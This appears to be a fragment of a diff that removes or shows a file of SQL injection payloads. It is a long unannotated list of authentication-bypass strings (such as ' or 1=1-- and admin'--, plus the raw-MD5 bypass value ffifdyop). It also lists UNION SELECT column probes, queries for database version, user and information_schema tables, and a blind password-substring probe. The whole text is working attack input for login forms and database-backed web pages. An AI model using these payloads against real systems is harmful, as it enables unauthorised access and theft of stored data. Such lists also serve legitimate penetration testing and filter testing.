|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
